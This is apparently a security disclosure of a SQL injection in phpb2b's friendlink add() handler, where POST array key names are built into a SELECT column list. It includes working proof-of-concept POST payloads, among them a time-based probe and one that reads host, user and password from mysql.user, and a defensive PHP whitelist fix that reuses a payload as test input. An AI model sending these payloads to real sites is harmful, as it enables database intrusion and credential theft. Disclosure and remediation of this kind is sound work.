### Brief description: SQL injection #4

### Details:

Injection entry point: `/libraries/core/controllers/friendlink_controller.php`
Injection parameter: `friendlink`
Vulnerable code (starting at line 18):

```php
function add() {
    global $smarty;
    using("message");
    $pms = new Messages();
    if (isset($_POST['do']) && !empty($_POST['friendlink'])) {
        pb_submit_check('friendlink');
        $data = $_POST['friendlink'];
        $result = false;
        $data['status'] = 0;
        $data['created'] = $data['modified'] = $this->friendlink->timestamp;
        $result = $this->friendlink->save($data);
        if ($result) {
            $pms->SendToAdmin('', array(
                "title"   => $data['title'].L("apply_friendlink"),
                "content" => $data['title'].L("apply_friendlink")."\n".$_POST['data']['email']."\n".$data['description'],
            ));
            flash('wait_apply');
        }
    } else {
        flash();
    }
}
```

`$data = $_POST['friendlink'];` reads the `friendlink` array parameter from the POST body, and the whole `$data` array is handed to `save()`. Inside `save()` the SQL statement is assembled by the following code (excerpt from `libraries/core/model.php`):

```php
$keys = array_keys($posts);
$cols = implode($keys, ",");
$tbname = (is_null($tbname)) ? $this->getTable() : trim($tbname);
$this->table_name = $tbname;
if (!empty($id)) {
    $sql = "SELECT $cols FROM ".$tbname." WHERE ".$this->primaryKey."='".$id."'";
```

In `save()` the key names of the `$data` array are joined into the column list `$cols` of the SELECT statement. Because `$data` is attacker-controlled this is SQL injection, and because the payload lives in the array key names rather than the values, it bypasses the injection check applied by the code.

### Proof of vulnerability:

First open `http://127.0.0.1/phpb2b/index.php?do=friendlink&action=add` and view the page source to obtain the form token:

```html
<input type="hidden" name="formhash" value="7a8999986df50ec2" id="FormHash">
```

![1.png](https://images.seebug.org/upload/201502/091347283946346da1b90c3ded1455d7ee1d8606.png)

With the token in hand, the SQL injection can be performed:

```
http://127.0.0.1/phpb2b/index.php?do=friendlink&action=add
Post: friendlink[if((length(user())>61),1,sleep(5))%23]=1&do=1&formhash=7a8999986df50ec2
```

![2.png](https://images.seebug.org/upload/201502/0913471025b105352e43d4897ec68ff7af92b884.png)

MySQL log:

![3.png](https://images.seebug.org/upload/201502/09134701a457201a3d3eba4cce8e888ed326f664.png)

The time-based injection executes successfully. The SQL injection check can be ignored entirely and arbitrary SQL statements executed:

```
http://127.0.0.1/phpb2b/index.php?do=friendlink&action=add
Post: friendlink[host,user,password/**/from/**/mysql.user/**/where/**/1>0/**/limit/**/0,1%23]=1&do=1&formhash=7a8999986df50ec2
```

For easier debugging, the SQL statement was printed out in the code.

![4.png](https://images.seebug.org/upload/201502/0913464327fcd890a999a70f481a553d9032cd1c.png)

MySQL log:

![5.png](https://images.seebug.org/upload/201502/09134633b2e3360745fdfc3d588be508120c8010.png)
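The root cause above is that `save()` trusts user-supplied array keys as column names, so a check that only inspects parameter values (such as `pb_submit_check`) never sees the payload. The following is an added example of how a defender would harden that code path; it is not phpb2b's own code. The class name `SafeModel`, the column whitelist `FRIENDLINK_COLUMNS`, and the table name `pb_friendlink` are assumptions for illustration. Keys are validated against a whitelist and an identifier regex before any SQL is built, identifiers are backtick-quoted, and the record id is bound as a prepared-statement parameter instead of being concatenated.

```php
<?php
// Added example (not phpb2b's code): hardened column-list construction for a
// save()-style helper. Column names never come from user-supplied array keys
// unchecked; they are filtered against an explicit whitelist, quoted as
// identifiers, and the record id is passed as a bound parameter.

final class SafeModel
{
    /** Assumed: the columns the friendlink form is actually allowed to set. */
    public const FRIENDLINK_COLUMNS = ['title', 'url', 'description', 'email'];

    /**
     * Keep only submitted fields whose keys are known columns.
     * A key that is not a plain identifier raises an exception, so the
     * key-name injection described in the report never reaches the SQL builder.
     */
    public static function filterColumns(array $posts, array $allowed): array
    {
        $clean = [];
        foreach ($posts as $key => $value) {
            // Identifiers only: letter first, then letters/digits/underscore, max 64 chars.
            if (!is_string($key) || !preg_match('/^[A-Za-z][A-Za-z0-9_]{0,63}$/', $key)) {
                throw new InvalidArgumentException('Rejected malformed column name');
            }
            if (in_array($key, $allowed, true)) {
                $clean[$key] = $value;
            }
        }
        return $clean;
    }

    /** Quote an already-validated identifier for MySQL. */
    public static function quoteIdent(string $name): string
    {
        return '`' . str_replace('`', '``', $name) . '`';
    }

    /**
     * Build the "does this row exist" SELECT that save() runs when an id is
     * present. Returns [sql, params] for use with a prepared statement.
     */
    public static function buildExistsQuery(array $posts, string $table, string $primaryKey, int $id): array
    {
        $cols = implode(', ', array_map([self::class, 'quoteIdent'], array_keys($posts)));
        $sql = sprintf(
            'SELECT %s FROM %s WHERE %s = ?',
            $cols,
            self::quoteIdent($table),
            self::quoteIdent($primaryKey)
        );
        return [$sql, [$id]];
    }
}

// Constructed input: one legitimate field plus a key of the kind shown in the
// report (SQL placed in the array key, value harmless).
$submitted = [
    'title' => 'Example site',
    'if((length(user())>61),1,sleep(5))#' => '1',
];

try {
    $data = SafeModel::filterColumns($submitted, SafeModel::FRIENDLINK_COLUMNS);
} catch (InvalidArgumentException $e) {
    // The malformed key is refused before any SQL text exists; log and stop.
    error_log('friendlink add rejected: ' . $e->getMessage());
    $data = SafeModel::filterColumns(['title' => 'Example site'], SafeModel::FRIENDLINK_COLUMNS);
}

// Assumed table/primary key names; the id is bound, not concatenated.
[$sql, $params] = SafeModel::buildExistsQuery($data, 'pb_friendlink', 'id', 7);
echo $sql, "\n";
// $pdo->prepare($sql)->execute($params);
```

The whitelist is the important part: quoting identifiers alone would still let a caller select any column of the table, so the set of permitted keys should be fixed per form rather than derived from the request. Rejecting (and logging) malformed keys, instead of silently dropping them, also gives the operator a detection signal for probes like the ones in the proof above.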